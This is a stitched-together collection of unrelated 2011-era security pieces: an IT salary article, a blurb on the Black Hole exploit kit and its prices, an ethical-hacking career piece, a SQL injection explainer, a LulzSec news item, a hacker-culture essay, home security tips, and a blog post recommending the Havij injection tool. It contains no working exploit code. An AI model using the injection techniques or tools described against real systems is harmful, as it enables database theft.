6 Hot IT Jobs That Will Pay Well in 2012

Added on Dec 02, 2011 by Meridith Levinson, CIO.com

Despite ominous predictions about how cloud computing will eviscerate IT departments, 2012 is shaping up to be a great year for IT careers. Cloud computing is in fact creating new roles for IT professionals, while the proliferation of smartphones and tablets has ignited demand for software developers. The IT job market, which experienced a strong rebound in 2011 after the recession, is expected to burn even brighter in 2012, despite global economic challenges, according to IT staffing industry executives.

"I expect it to be better and not just a little bit better," says Tammy Browning, senior vice president of Yoh staffing's western region. "I would say it will be 10 to 15 percent better than 2011 in terms of hiring."

Indeed, Jerry Irvine, CIO of Chicago-based IT outsourcer Prescient Solutions, says he has hired 30 people so far in 2011 and plans to add another 30 to 40 next year. Currently, he has 13 open positions for senior project managers, SharePoint programmers, infrastructure engineers, systems engineers and ITIL helpdesk technicians.

Aggressive hiring is good news for the many IT professionals seeking new jobs. According to the latest IT Employee Confidence Index from staffing firm Technisource, 32 percent of 257 employed IT professionals plan to look for a new job.

IT staffing experts also anticipate that IT salaries will finally spike after years of stagnation, as employers realize they need to pay premiums for certain IT skills in a competitive job market.

"Tech salaries have been flat for a number of years," says Alice Hill, managing director of IT job site Dice.com. Hiring managers have tried their best to poach good people from competitors, she says, but now they're going to have to increase pay to compete on the staffing front.

Shane Bernstein, managing director of Los Angeles-based IT staffing firm Q, concurs: "Salaries and [contract] rates will be higher [in 2012] because the economy seems to be getting better in the tech sector. More companies are hiring. The supply of talent is extremely low and the demand for talent is extremely high."

Want more good news? The job opportunities and earning potential aren't centered solely in Silicon Valley. Across the country, from New Hope, Penn. to Scottsdale, Ariz., companies are vying for IT talent, adds Hill.

Here are the six IT jobs that staffing experts say will be in greatest demand and will command the highest salaries in 2012. The best part: Many of these jobs are also serious fun.

1. Mobile Application Developers

IT professionals who can develop applications for mobile devices are hands down the hottest commodity in IT these days. IT staffing experts agree that this group will remain in this enviable position through 2012, as companies race to adapt their Websites and apps for smartphones and tablets.

Demand for mobile application developers is obvious on Dice.com, where job postings for Android and iPhone developers are up 129 and 190 percent, respectively, over last year, according to Hill.

The technology division of staffing firm Robert Half International projects starting salaries for mobile application developers to increase 9.1 percent in 2012, to a range of $85,000 to $122,500 per year.

Yoh's Browning says salaries for mobile game developers range from $110,000 to $140,000 per year, but she notes, they tend to prefer to work as free agents. "On average, an Android developer can demand $70 per hour to $100 per hour on a contract," she says.

Adds Hill, "It's never a bad time to be a software developer, especially right now, and if you're a mobile software developer, it's your year."

2. Software Developers

Programmers writing PC-based applications should not feel slighted by their mobile counterparts. Companies need their share of Java, .NET, C#, SharePoint, and Web application developers. Yoh's Browning says Java is hot because it's an open platform that speaks to any back-end system, so large organizations use it to transfer data from legacy systems. Consequently, the salary range for Java developers runs from $60,000 to $150,000 per year, depending on experience. The average contract rate for Java developers is $90 per hour. Base salaries for Web developers range from $61,250 to $99,250 per year, according to Robert Half.

3. User Experience Designers

Because so many of the apps companies are developing--whether for PCs or mobile devices--are customer facing, they need user interface or user experience designers to ensure the apps are fun and intuitive to use. Robert Half anticipates starting salaries for user experience designers to rise 6.7 percent, to between $71,750 and $104,000 per year.

4. IT Security Professionals

As security threats from Duqu to data breaches mount, organizations need IT professionals who can fend off malware makers and cyber thieves. Hill says job ads on Dice.com for various "cyber security" professionals increased a whopping 141 percent in 2011 over the prior year.

Organizations' shift to cloud computing is also spurring the need for infrastructure security professionals, says Prescient Solutions' Irvine. "By putting applications in the cloud, companies have more Internet paths," he says. "They have to have a more secure environment to control entrances and exits to and from their environment."

Irvine also anticipates application security specialists--people who run application scanners through individual Web pages in search of vulnerabilities--will have a good year for finding jobs in 2012.

Robert Half expects base salaries for data security analysts to rise six percent, to a range of $89,000 to $121,500 per year.

5. Data Warehouse Architects, Analysts and Developers

Companies' desire to extract insights from the petabytes of data streaming into their back office systems is driving demand for data warehouse architects, analysts and developers. Q's Bernstein says companies will be making a big push in 2012 to clean and organize their data so that they can better mine it.

Robert Half expects base salaries for data warehouse analysts to climb 6.7 percent, to a range of $88,000 to $119,000 per year in 2012. According to Q, data warehouse developers command average salaries in the range of $120,000 to $135,000 per year or contract rates ranging from $65 to $85 per hour. Data warehouse architects can earn $130,000 to $160,000 per year or $80 (or more, depending on experience) per hour on contract, also according to Q.

6. Infrastructure Professionals

Cloud computing has yet to eliminate IT infrastructure jobs. Now and through 2012, cloud computing--and Windows 7 migrations--are creating demand for network engineers and systems administrators.

Dice.com's Hill says companies are seeking IT professionals who can set up and manage virtual server and virtual storage environments, who can identify which applications are used the most, and who know how to reallocate hard drive storage among those various applications.

The move to Windows 7 is necessitating infrastructure upgrades for some companies, while others eye opportunities to consolidate their data centers and move applications to the cloud, says Sean Ebner, vice president of strategic accounts for Technisource. In the short term, IT departments need infrastructure professionals who can help them plan and execute upgrades and consolidation initiatives, he says.

Network engineers should see their salaries rise 5.8 percent due to increased demand in 2012, to a range of $75,000 to $107,750 per year, according to Robert Half.

"The demand for this talent is so high right now," says Yoh's Browning of these hot IT jobs. "Hiring managers need to move quickly and waste no time putting offers out. There are bidding wars right now for this talent."

Black Hole Exploit Kit - A Deadly Russian Crimeware

Russian hackers have a very strong history with malware development, Infact ressians hackers currently own word's most dangerous malewares. Once of those dangerous and popular malware's we have is the " Black Hole Exploit Kit". Black hole exploit kit is basically a collection of tons of browser exploit which takes advantage of the vulnerability on user browser in order to infect your computer.

How Does It Works?

When ever a user visits a clean website, the malicious Iframe then redirects the user to the blackhole exploit server, which then triggers out all the well known exploits on victims browser and gives remote access to the attacker.

Cost

The annual license for blackhole exploit kit costs around 1500$, the semi annual license costs 700$ and the quearterly license cost 700$. The author also gives you option to rent the exploit kit as well as you can host the exploit kit on the authors server for small fee.

The Hindu : FEATURES / OPPORTUNITIES

Licence to Hack

Payal Chanania

Information theft has reached terrifying proportions - computer-savvy criminals maliciously attack network security systems and steal confidential information, intercept data transfer, hack email accounts, spread viruses and even commit identity theft. All that hackers need is an infinitesimal loophole to breach the most secure corporate, bank or even government website to wreak mischief, damage or even sabotage.

Now shrewd companies are playing these devious experts at their own game by employing ‘ethical hackers' to actually attack their own computer networks! Yes, these ‘white hats' are actually paid to attempt to penetrate or crash the security system in a bid to detect potential vulnerabilities and suggest changes to increase the safety. This pre-emptive measure tests the effectiveness and quality of the network systems and prevents intrusions before they occur.

The term hacker does carry negative connotations, but it proffers a legitimate occupation for computer experts to keep the bad guys out. They use the same techniques and tactics to breach security protocols as their shadier counterparts, but from an ethical standpoint.

This niche job extends unique and interesting functions like quantitatively assessing and evaluating current weaknesses, threats and flaws that can compromise the network security and designing impenetrable systems to keep the information as secure as possible.

Career wise: Ethical hacking (or penetration testing, intrusion testing, red teaming) is a bright and lucrative career option as large companies are beginning to maintain their own teams of ethical hackers.

A survey by the International Data Corp states that the worldwide demand for information security professionals is 60,000 and companies such as Wipro, Infosys, IBM, Airtel and Reliance are always looking for good ethical hackers.

Scope: You can work as an information security specialist/consultant with security firms or a full-time company employee; freelancers are not as preferred by established companies in India. Ethical hacking opens the doors to a multitude of IT based entry-level job positions like Network Security Administrator, Network Defence Analyst, Network Defence Infrastructure Support, Web Security Administrator, Server Administrator, Application Security Tester, Ethical Hacker/Penetration Tester, Security Auditor. Else, you can opt for secured programming, cryptography or forensics.

The job role can extend from authorised hacking to network security surveillance, security tools installation and maintenance, application testing, wireless LAN assessment. There is immense scope for career growth and progression up the ladder – a Network Security Administrator of today can move on to NS Manager, then NS Officer and even become the Chief Information Security Officer in the future.

Similarly, the career graph of an Application Security Tester rises through AS Developer, AS Manager before Chief Application Security Officer. Security Certified Programmers can also progress to Security Project Managers.

Remuneration: In India, pay packages start from Rs.3-6 lakhs per annum and can even go up to Rs.30 lakhs depending on background, experience and job function. Top employers are Wipro, Accenture, IBM, Dell, Google, Cap Gemini, etc. with employment opportunities primarily in Bangalore, Hyderabad, Mumbai, Pune and Chennai.

Ankit Fadia, a renowned computer security expert observes, “Currently there is a huge gap between the demand and supply. Because of this shortage, pay packages and growth opportunities are superlative and ever-growing.” According to K.K. Mookhney, founder and principal consultant of NIIC consulting, “Salaries for information security professionals are at least 20-30% higher than for most other positions at the same level in other fields of IT.”

Skills: The field is open to bright computer science graduates, skilled computer experts or even malicious hackers looking to reform! It is important to have talent, affinity and passion for computers. Excellent programming and networking skills, college-level background in IT is helpful.

A creative streak will enable you to think out-of-the-box and visualise/create different ways to encroach the most secure of systems.

Honesty, integrity and trustworthiness are a must as you will be privy to important (maybe even highly sensitive information). Safeguarding the privacy and confidentiality of the client/user information is highly imperative.

Rigid background checks and security clearance is essential for government work. According to Mookhney, “A good information security professional should have a thirst for knowledge, be able to grasp new concepts quickly, work hard on their own, and have a great love for technology”.

Qualifications: You can opt for formal training or learn it on your own through experience. However both government and corporate sectors are more likely to hire ethical hackers with verifiable credentials. You also have to regularly update your knowledge through workshops, seminars, trade magazines and industry conventions to be aware of the latest tools, techniques and technologies.

Some of the most prevalent professional training certifications in India are:

Certified Ethical Hacker (EC-Council)

Certified Hacking Forensic Investigator (EC-Council)

GIAC Certified Penetration Tester (GPEN) offered by SAN

GIAC Certified Intrusion Analyst (GCIA) The time period varies from a fast-tracked 5 days to 3 months and course fee is Rs. 10,000 upwards. Both online and offline courses provide intimate knowledge of network security protocols, multiple computer codes and extensive hands-on training for spotting vulnerabilities.

Yet, the risk of prosecution often keeps bright IT enthusiasts from building a career in information security.

Remember that this is authorised access and organisations cover the risk of defrauds by defining the parameters of probing, penetrating and testing in a legally binding contract.

This works as your security blanket too and will protect you from the law provided you strictly abide by the ethical codes. Also, be aware of the laws and penalties of unauthorised hacking and never begin any hacking activities until you have a signed legal document giving you express permission.So get set to join the online cops' brigade with a license to hack!

Payal Chanania

faqs@cnkonline.com

Institutes

Appin Knowledge Solutions

http://www.appinonline.com/acse.php

Is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?

Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your web application/s (generally over port 80/443). The web application has open access to the database in order to return (update) the requested (changed) information.
The Firewalls and similar intrusion detection mechanisms provide little or no defense against full-scale SQL Injection web attacks.
In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application.
SQL or Structured Query Language is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (or a collection of tables which organise and structure data). SQL is, in fact, the only way that a web application (and users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which use SQL as their basic building blocks.
SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and in fact will eliminate the table with a particular name.
In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look like the following:
SELECT count(*)
FROM users_list_table
WHERE username=’FIELD_USERNAME’
AND password=’FIELD_PASSWORD”
In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user to the combination it has already stored.
Each type of web application is hard coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitised, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function.
A hacker will thus have a clear channel of communication (or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and network security equipment installed before the physical database server.

CIA website hacked

The public website of the Central Intelligence Agency went down evening as the hacker group Lulz Security said it had launched an attack.

BOSTON: The public website of the Central Intelligence Agency went down evening as the hacker group Lulz Security said it had launched an attack.

Lulz Security has claimed responsibility for recent attacks on the Senate, Sony Corp, News Corp and the US Public Broadcasting System television network.

The CIA site initially could not be accessed from New York to San Francisco, and Bangalore to London. Later in the evening service was sporadic.

"We are looking into these reports," a CIA spokeswoman said.

Lulz Security has defaced websites, posted personal information about customers and site administrators, and disclosed the network configurations of some sites.

Security analysts have downplayed the significance of these attacks, saying the hackers are just looking to show off and get as much attention as possible.

In the case of the CIA attack, hackers would not be able to access sensitive data by breaking into the agency's public website, said Jeffrey Carr, author of the book Inside Cyber Warfare: Mapping the Cyber Underworld.

"All they're doing is saying 'Look how good we are,'" Carr said. "These guys are literally in it for embarrassment, to say 'your security is crap.'"

Lulz only made claims that it attacked www.cia.gov, and there was no evidence on Wednesday evening that sensitive data in the agency's internal computer network had been compromised.

There also were no apparent links to more serious network security breaches recently at the International Monetary Fund and Lockheed Martin Corp. Lulz Security has not been linked to those incidents.

Lulz, whose members are strewn across the globe, announced the attack shortly before 6 p.m. East Coast time.

"Tango down," the group Tweeted, pointing to www.cia.gov.

Although the group, also known as Lulz Boat, fashions itself more as pranksters and activists than people with sinister intent, its members have been accused of breaking the law and are wanted by the FBI and other law enforcement agencies.

Lulz broke into a public website of the Senate over the weekend and released data stolen from the legislative body's computer servers.

In May, the group posted a fake story on the PBS website saying that rapper Tupac Shakur was still alive and living in New Zealand. Shakur was murdered in 1996.

Hacker’s Attitude

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest Arpanet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the UNIX operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture and contributed to it, you're a hacker

There is another group of people who loudly call themselves hackers, but aren't. These are people who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers.

The basic difference is this: hackers build things, crackers break them.

Hacker’s Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself

If you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

To be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

2. Nobody should ever have to solve a problem twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else.

4. If you don't have functional English, learn it.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, becoming a hacker will take intelligence, practice, dedication, and hard work. Competence at demanding skills that involve mental acuteness, craft, and concentration is best.

Hackers need to be able to both reasons logically and step outside the apparent logic of a problem at a moment's notice.

To be a hacker you need motivation and initiative and the ability to educate yourself. So Start now...

FAQs:

Will you teach me how to hack?

Hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with questions.

What language should I learn first, if I have to?

It depends….

Perl, Python, C and C++ are some of the popular programming languages used by the hackers.

The most common methods used by Hackers

The most common methods used by intruders to gain control of home
computers are briefly described below.

1. Trojan horse programs

Trojan horse programs are a common way for intruders to trick you
(sometimes referred to as "social engineering") into installing "back
door" programs. These can allow intruders easy access to your
computer without your knowledge, change your system configurations,
or infect your computer with a computer virus.

2. Back door and remote administration programs

On Windows computers, three tools commonly used by intruders to
gain remote access to your computer are BackOrifice, Netbus, and
SubSeven. These back door or remote administration programs, once
installed, allow other people to access and control your computer.

3. Denial of service

Another form of attack is called a denial-of-service (DoS) attack. This
type of attack causes your computer to crash or to become so busy
processing data that you are unable to use it. It is important to note that
in addition to being the target of a DoS attack, it is possible for your
computer to be used as a participant in a denial-of-service attack on
another system.

4. Being an intermediary for another attack

Intruders will frequently use compromised computers as launching
pads for attacking other systems. An example of this is how distributed
denial-of-service (DDoS) tools are used. The intruders install
an "agent" (frequently through a Trojan horse program) that runs on
the compromised computer awaiting further instructions. Then, when a
number of agents are running on different computers, a single "handler"
can instruct all of them to launch a denial-of-service attack on another
system. Thus, the end target of the attack is not your own computer,
but someone else’s -- your computer is just a convenient tool in a larger

attack.

5. Unprotected Windows shares

Unprotected Windows networking shares can be exploited by intruders
in an automated way to place tools on large numbers of Windows-
based computers attached to the Internet. Because site security on the
Internet is interdependent, a compromised computer not only creates
problems for the computer's owner, but it is also a threat to other sites
on the Internet. The greater immediate risk to the Internet community
is the potentially large number of computers attached to the Internet
with unprotected Windows networking shares combined with distributed
attack tools.
Another threat includes malicious and destructive code, such as viruses
or worms, which leverage unprotected Windows networking shares to
propagate.
There is great potential for the emergence of other intruder tools that
leverage unprotected Windows networking shares on a widespread
basis.

6. Mobile code (Java/JavaScript/ActiveX)

There have been reports of problems with "mobile code" (e.g. Java,
JavaScript, and ActiveX). These are programming languages that
let web developers write code that is executed by your web browser.
Although the code is generally useful, it can be used by intruders
to gather information (such as which web sites you visit) or to run
malicious code on your computer. It is possible to disable Java,
JavaScript, and ActiveX in your web browser.

7. Cross-site scripting

A malicious web developer may attach a script to something sent to a
web site, such as a URL, an element in a form, or a database inquiry.
Later, when the web site responds to you, the malicious script is
transferred to your browser.
You can potentially expose your web browser to malicious scripts by
following links in web pages, email messages, or newsgroup postings
without knowing what they link to
using interactive forms on an untrustworthy site
viewing online discussion groups, forums, or other dynamically

generated pages where users can post text containing HTML tags

8. Packet sniffing

A packet sniffer is a program that captures data from information
packets as they travel over the network. That data may include
user names, passwords, and proprietary information that travels
over the network in clear text. With perhaps hundreds or thousands
of passwords captured by the packet sniffer, intruders can launch
widespread attacks on systems. Installing a packet sniffer does not
necessarily require administrator-level access.
Relative to DSL and traditional dial-up users, cable modem users have
a higher risk of exposure to packet sniffers since entire neighborhoods
of cable modem users are effectively part of the same LAN. A packet
sniffer installed on any cable modem user's computer in a neighborhood
may be able to capture data transmitted by any other cable modem in
the same neighborhood.

The methods to ensure Internet security

1. Use a firewall
We strongly recommend the use of some type of firewall product for Internet security, such as a network appliance or a personal firewall software package. Intruders are constantly scanning home user systems for known vulnerabilities. Network firewalls (whether software or hardware-based) can provide some degree of protection against these attacks.

2. Don't open unknown email attachments
Before opening any email attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus spread precisely because it originated from a familiar address. Malicious code might be distributed in amusing or enticing programs.
If you must open an attachment before you can verify the source, we suggest the following procedure:

a. save the file to your hard disk
b. scan the file using your antivirus software
c. open the file

For additional protection, you can disconnect or lock your computer's network connection before opening the file.
Following these steps will reduce, but not wholly eliminate, the chance that any malicious code contained in the attachment might spread from your computer to others.

3. Don't run programs of unknown origin
Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program. These programs seriously hurt Internet Security.

4. Disable hidden filename extensions
Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but you can disable this option in order to have file extensions displayed by Windows. After disabling this option, there are still some file extensions that, by default, will continue to remain hidden.
There is a registry value which, if set, will cause Windows to hide certain file extensions regardless of user configuration choices elsewhere in the operating system. The "NeverShowExt" registry value is used to hide the extensions for basic Windows file types. For example, the ".LNK" extension associated with Windows shortcuts remains hidden even after a user has turned off the option to hide extensions.

5. Keep all applications, including your operating system, patched
Vendors will usually release patches for their software when a vulnerability has been discovered. Most product documentation offers a method to get updates and patches. You should be able to obtain updates from the vendor's web site. Read the manuals or browse the vendor's web site for more information.
Some applications will automatically check for available updates, and many vendors offer automatic notification of updates via a mailing list. Look on your vendor's web site for information about automatic notification. If no mailing list or other automated notification mechanism is offered you may need to check periodically for updates.

6. Turn off your computer or disconnect from the network when not in use
Turn off your computer or disconnect its Ethernet interface when you are not using it. An intruder cannot attack your computer if it is powered off or otherwise completely disconnected from the network.

7. Disable Java, JavaScript, and ActiveX if possible
Be aware of the risks involved in the use of "mobile code" such as ActiveX, Java, and JavaScript. A malicious web developer may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. Later, when the web site responds to you, the malicious script is transferred to your browser.
The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Turning off these options will keep you from being vulnerable to malicious scripts. However, it will limit the interaction you can have with some web sites.
Many legitimate sites use scripts running within the browser to add useful features. Disabling scripting may degrade the functionality of these sites.

8. Disable scripting features in email programs
Because many email programs use the same code as web browsers to display HTML, vulnerabilities that affect ActiveX, Java, and JavaScript are often applicable to email as well as web pages. Therefore, in addition to disabling scripting features in web browsers, we recommend that users also disable these features in their email programs. It is important to Internet security.

9. Make regular backups of critical data
Keep a copy of important files on removable media such as ZIP disks or recordable CD-ROM disks (CD-R or CD-RW disks). Use software backup tools if available, and store the backup disks somewhere away from the computer.

10. Make a boot disk in case your computer is damaged or compromised
To aid in recovering from a security breach or hard disk failure, create a boot disk on a floppy disk which will help when recovering a computer after such an event has occurred. Remember, however, you must create this disk before you have a security event.

11. Consult your system support personnel if you work from home
If you use your broadband access to connect to your employer's network via a Virtual Private Network (VPN) or other means, your employer may have policies or procedures relating to the security of your home network. Be sure to consult with your employer's support personnel, as appropriate, before following any of the steps outlined in this document.

Can I Become A Good Hacker Without A Prior Knowledge Of Programming??

"Can I become a good hacker without knowning Programming?", "Is Programming necessary for learning how to hack", I usually get these question asked almost daily, There have been lots of debates on this topic, Some think that it's necessary while others think that it's not necessary at all, So I thought to write a post on this topic explaining my views if programming is necessary for becoming a hacker or not.

The answer is that it depends:

Why it's not necessary?

In early 90's the best hackers were known as those who were best at the knowledge of programming and the reason for that was probably that almost every thing was based on a command line so it was for sure that if some one is a good hacker he is surely a good programmer.

However the definition of hackers sort of changed after the beginning of 21'ST century, One could become a fairly good hacker without any knowledge of programming, This reason for that is because now a days there are lots of ready made tools which helps you to compromise a machine without any knowledge of Programming, Take an example of "Havij", Havij is a small software which helps you automate the process of SQL Injection and helps you extract sensitive database information in seconds where it may take hours in some cases to extract it, If you still don't agree with me try answering the following question:

Does it matter if an elite hacker writes a buffer overflow or a script kiddy runs a tool if the target system gets compromised anyway?

Where It's Necessary?

It's true that many good hackers are technology buffs and are curious about how things work, this is where you need to have prior knowledge of Programming in order to know how things work.

Another reason is why you should probably learn Programming is that you can write your own exploit (An exploit is a peice of code which can be used to gain access to the target machine using a specific vulnerability), which is the single most important thing which will separate you from rest of the script kiddies out there and most of the times some of the exploit codes comes with several code mistakes which are kept by Elite hackers themselves to prevent script kiddies or people with very little knowledge of hacking to run it.

In Short:

You can become a fairly good hacker without having a prior knowledge of programming but if you want take your hacking skills to the next level I will recommend you to learn Programming now the question which might arise in your mind is that what Programming languages should I learn?, I will cover it in my upcoming posts.

Feel free to express your views on the topic, Whether you agree with me or not?